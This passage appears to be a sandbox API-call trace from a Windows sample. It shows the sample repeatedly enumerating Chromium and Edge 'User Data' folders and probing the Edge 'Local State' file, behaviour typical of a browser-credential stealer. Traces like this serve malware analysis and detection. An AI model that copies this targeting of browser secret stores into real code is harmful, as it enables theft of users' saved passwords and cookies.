ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.004] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.004] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.005] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.005] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.006] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.006] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.007] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.007] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.007] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.007] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.007] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.007] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.007] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*") returned 58 [0207.007] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x4c005c, ftCreationTime.dwLowDateTime=0x63006f, ftCreationTime.dwHighDateTime=0x6c0061, ftLastAccessTime.dwLowDateTime=0x530020, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x650074, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.007] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.007] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0207.008] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0207.008] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" [0207.008] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\local state")) returned 0xffffffff [0207.008] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*") returned 62 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.009] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.009] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.009] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.009] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.009] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.009] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.010] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.010] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.010] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.010] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 